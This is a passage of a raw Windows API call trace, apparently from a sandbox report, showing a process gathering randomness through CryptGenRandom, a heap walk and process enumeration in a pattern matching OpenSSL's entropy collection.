hHeap=0x630000, dwFlags=0x0, lpMem=0x325ed90 | out: hHeap=0x630000) returned 1 [0228.273] GetCurrentThreadId () returned 0x314 [0228.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x190) returned 0x6fdc78 [0228.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0228.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0228.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc08 [0228.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0228.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696c28 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0228.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0228.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.311] GetCurrentThreadId () returned 0x314 [0228.311] GetVersionExA (in: lpVersionInformation=0x3adf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x3adf3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x3adf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.311] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76780000 [0228.312] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x74ea0000 [0228.312] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74430000 [0228.895] GetProcAddress (hModule=0x74430000, lpProcName="NetStatisticsGet") returned 0x7443644f [0228.895] GetProcAddress (hModule=0x74430000, lpProcName="NetApiBufferFree") returned 0x744613d2 [0228.895] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x3adf02c | out: Buffer=0x3adf02c) returned 0x0 [0228.912] GetCurrentThreadId () returned 0x314 [0228.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.913] NetApiBufferFree (Buffer=0x6a7330) returned 0x0 [0228.913] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x3adf02c | out: Buffer=0x3adf02c) returned 0x0 [0228.926] GetCurrentThreadId () returned 0x314 [0228.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.926] NetApiBufferFree (Buffer=0x31d6990) returned 0x0 [0228.926] FreeLibrary (hLibModule=0x74430000) returned 1 [0228.929] GetProcAddress (hModule=0x76780000, lpProcName="CryptAcquireContextW") returned 0x7678df14 [0228.929] GetProcAddress (hModule=0x76780000, lpProcName="CryptGenRandom") returned 0x7678dfc8 [0228.929] GetProcAddress (hModule=0x76780000, lpProcName="CryptReleaseContext") returned 0x7678e124 [0228.929] CryptAcquireContextW (in: phProv=0x3adf018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adf018*=0x6951f0) returned 1 [0228.930] CryptGenRandom (in: hProv=0x6951f0, dwLen=0x40, pbBuffer=0x3adf464 | out: pbBuffer=0x3adf464) returned 1 [0228.930] GetCurrentThreadId () returned 0x314 [0228.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.931] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0228.931] CryptAcquireContextW (in: phProv=0x3adf018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x3adf018*=0x6951f0) returned 0 [0228.931] FreeLibrary (hLibModule=0x76780000) returned 1 [0228.931] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0228.931] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0228.931] GetDesktopWindow () returned 0x10010 [0228.931] GetProcessWindowStation () returned 0x48 [0228.931] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x3adefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x3adefa0) returned 0 [0228.931] GetLastError () returned 0x7a [0228.931] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x3adef80, nLength=0x10, lpnLengthNeeded=0x3adefa0 | out: pvInfo=0x3adef80, lpnLengthNeeded=0x3adefa0) returned 1 [0228.931] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76430000 [0228.932] GetProcAddress (hModule=0x76430000, lpProcName="GetForegroundWindow") returned 0x76452320 [0228.932] GetProcAddress (hModule=0x76430000, lpProcName="GetCursorInfo") returned 0x764a812f [0228.932] GetProcAddress (hModule=0x76430000, lpProcName="GetQueueStatus") returned 0x76453924 [0228.932] GetForegroundWindow () returned 0x1005e [0228.933] GetCurrentThreadId () returned 0x314 [0228.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.933] GetCursorInfo (in: pci=0x3adf450 | out: pci=0x3adf450) returned 1 [0228.933] GetQueueStatus (flags=0xbf) returned 0x0 [0228.933] GetCurrentThreadId () returned 0x314 [0228.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0228.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0228.933] FreeLibrary (hLibModule=0x76430000) returned 1 [0228.933] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ed735f [0228.934] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0228.934] GetProcAddress (hModule=0x74ea0000, lpProcName="Heap32First") returned 0x74f35763 [0228.934] GetProcAddress (hModule=0x74ea0000, lpProcName="Heap32Next") returned 0x74f3594e [0228.934] GetProcAddress (hModule=0x74ea0000, lpProcName="Heap32ListFirst") returned 0x74f35621 [0228.934] GetProcAddress (hModule=0x74ea0000, lpProcName="Heap32ListNext") returned 0x74f356cb [0228.935] GetProcAddress (hModule=0x74ea0000, lpProcName="Process32First") returned 0x74ed8ae7 [0228.935] GetProcAddress (hModule=0x74ea0000, lpProcName="Process32Next") returned 0x74ed88a4 [0228.935] GetProcAddress (hModule=0x74ea0000, lpProcName="Thread32First") returned 0x74f35b93 [0228.935] GetProcAddress (hModule=0x74ea0000, lpProcName="Thread32Next") returned 0x74f35c3f [0228.936] GetProcAddress (hModule=0x74ea0000, lpProcName="Module32First") returned 0x74f35cd9 [0228.936] GetProcAddress (hModule=0x74ea0000, lpProcName="Module32Next") returned 0x74f35dc2 [0228.936] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x650 [0229.347] GetTickCount () returned 0x11395f9 [0229.347] Heap32ListFirst (hSnapshot=0x650, lphl=0x3adf454) returned 1 [0229.348] GetCurrentThreadId () returned 0x314 [0229.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.348] Heap32First (lphe=0x3adefc0, th32ProcessID=0x55c, th32HeapID=0x630000) returned 1 [0229.397] GetCurrentThreadId () returned 0x314 [0229.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.397] Heap32Next (lphe=0x3adefc0) returned 1 [0229.421] GetTickCount () returned 0x1139647 [0229.421] GetCurrentThreadId () returned 0x314 [0229.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.421] Heap32Next (lphe=0x3adefc0) returned 1 [0229.446] GetTickCount () returned 0x1139657 [0229.446] GetCurrentThreadId () returned 0x314 [0229.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.446] Heap32Next (lphe=0x3adefc0) returned 1 [0229.470] GetTickCount () returned 0x1139676 [0229.470] GetCurrentThreadId () returned 0x314 [0229.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.470] Heap32Next (lphe=0x3adefc0) returned 1 [0229.497] GetTickCount () returned 0x1139695 [0229.497] GetCurrentThreadId () returned 0x314 [0229.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.498] Heap32Next (lphe=0x3adefc0) returned 1 [0229.532] GetTickCount () returned 0x11396b4 [0229.532] GetCurrentThreadId () returned 0x314 [0229.532] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.532] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.532] Heap32Next (lphe=0x3adefc0) returned 1 [0229.580] GetTickCount () returned 0x11396e3 [0229.580] GetCurrentThreadId () returned 0x314 [0229.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.580] Heap32Next (lphe=0x3adefc0) returned 1 [0229.655] GetTickCount () returned 0x1139731 [0229.655] GetCurrentThreadId () returned 0x314 [0229.655] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.655] Heap32Next (lphe=0x3adefc0) returned 1 [0229.679] GetTickCount () returned 0x1139741 [0229.679] GetCurrentThreadId () returned 0x314 [0229.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.680] Heap32Next (lphe=0x3adefc0) returned 1 [0229.705] GetTickCount () returned 0x1139760 [0229.705] GetCurrentThreadId () returned 0x314 [0229.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.705] Heap32Next (lphe=0x3adefc0) returned 1 [0229.730] GetTickCount () returned 0x113977f [0229.730] GetCurrentThreadId () returned 0x314 [0229.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.730] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.730] Heap32Next (lphe=0x3adefc0) returned 1 [0229.756] GetTickCount () returned 0x113978f [0229.756] GetCurrentThreadId () returned 0x314 [0229.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.756] Heap32Next (lphe=0x3adefc0) returned 1 [0229.781] GetTickCount () returned 0x11397ae [0229.781] GetCurrentThreadId () returned 0x314 [0229.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.781] Heap32Next (lphe=0x3adefc0) returned 1 [0229.806] GetTickCount () returned 0x11397bd [0229.806] GetCurrentThreadId () returned 0x314 [0229.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.806] Heap32Next (lphe=0x3adefc0) returned 1 [0229.833] GetTickCount () returned 0x11397dd [0229.833] GetCurrentThreadId () returned 0x314 [0229.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.833] Heap32Next (lphe=0x3adefc0) returned 1 [0229.897] GetTickCount () returned 0x113981b [0229.897] GetCurrentThreadId () returned 0x314 [0229.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.897] Heap32Next (lphe=0x3adefc0) returned 1 [0229.984] GetTickCount () returned 0x1139869 [0229.984] GetCurrentThreadId () returned 0x314 [0229.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0229.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0229.984] Heap32Next (lphe=0x3adefc0) returned 1 [0230.052] GetTickCount () returned 0x11398a7 [0230.052] GetCurrentThreadId () returned 0x314 [0230.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.052] Heap32Next (lphe=0x3adefc0) returned 1 [0230.104] GetTickCount () returned 0x11398e6 [0230.104] GetCurrentThreadId () returned 0x314 [0230.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.104] Heap32Next (lphe=0x3adefc0) returned 1 [0230.160] GetTickCount () returned 0x1139915 [0230.160] GetCurrentThreadId () returned 0x314 [0230.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.160] Heap32Next (lphe=0x3adefc0) returned 1 [0230.186] GetTickCount () returned 0x1139934 [0230.186] GetCurrentThreadId () returned 0x314 [0230.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.186] Heap32Next (lphe=0x3adefc0) returned 1 [0230.213] GetTickCount () returned 0x1139953 [0230.213] GetCurrentThreadId () returned 0x314 [0230.213] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.214] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.214] Heap32Next (lphe=0x3adefc0) returned 1 [0230.242] GetTickCount () returned 0x1139963 [0230.242] GetCurrentThreadId () returned 0x314 [0230.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.242] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.242] Heap32Next (lphe=0x3adefc0) returned 1 [0230.270] GetTickCount () returned 0x1139982 [0230.270] GetCurrentThreadId () returned 0x314 [0230.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.270] Heap32Next (lphe=0x3adefc0) returned 1 [0230.298] GetTickCount () returned 0x11399a1 [0230.298] GetCurrentThreadId () returned 0x314 [0230.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.299] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.299] Heap32Next (lphe=0x3adefc0) returned 1 [0230.328] GetTickCount () returned 0x11399c0 [0230.328] GetCurrentThreadId () returned 0x314 [0230.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.328] Heap32Next (lphe=0x3adefc0) returned 1 [0230.357] GetTickCount () returned 0x11399df [0230.357] GetCurrentThreadId () returned 0x314 [0230.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.358] Heap32Next (lphe=0x3adefc0) returned 1 [0230.386] GetTickCount () returned 0x11399ff [0230.386] Heap32ListNext (hSnapshot=0x650, lphl=0x3adf454) returned 1 [0230.386] GetTickCount () returned 0x11399ff [0230.386] GetTickCount () returned 0x11399ff [0230.386] Process32First (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.388] GetCurrentThreadId () returned 0x314 [0230.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.388] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.389] GetTickCount () returned 0x11399ff [0230.389] GetCurrentThreadId () returned 0x314 [0230.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.389] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.390] GetTickCount () returned 0x11399ff [0230.390] GetCurrentThreadId () returned 0x314 [0230.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.391] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.392] GetTickCount () returned 0x11399ff [0230.392] GetCurrentThreadId () returned 0x314 [0230.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.392] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.392] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.393] GetTickCount () returned 0x11399ff [0230.394] GetCurrentThreadId () returned 0x314 [0230.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.394] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.395] GetTickCount () returned 0x11399ff [0230.395] GetCurrentThreadId () returned 0x314 [0230.395] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.395] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.397] GetTickCount () returned 0x11399ff [0230.397] GetCurrentThreadId () returned 0x314 [0230.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.397] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.398] GetTickCount () returned 0x11399ff [0230.398] GetCurrentThreadId () returned 0x314 [0230.398] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.398] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.398] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.400] GetTickCount () returned 0x1139a0e [0230.400] GetCurrentThreadId () returned 0x314 [0230.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.400] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.400] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0230.401] GetTickCount () returned 0x1139a0e [0230.401] GetCurrentThreadId () returned 0x314 [0230.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.401] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.403] GetTickCount () returned 0x1139a0e [0230.403] GetCurrentThreadId () returned 0x314 [0230.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.403] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.404] GetTickCount () returned 0x1139a0e [0230.404] GetCurrentThreadId () returned 0x314 [0230.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.404] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.406] GetTickCount () returned 0x1139a0e [0230.406] GetCurrentThreadId () returned 0x314 [0230.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.406] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.407] GetTickCount () returned 0x1139a0e [0230.407] GetCurrentThreadId () returned 0x314 [0230.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.407] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.409] GetTickCount () returned 0x1139a0e [0230.409] GetCurrentThreadId () returned 0x314 [0230.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.409] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.410] 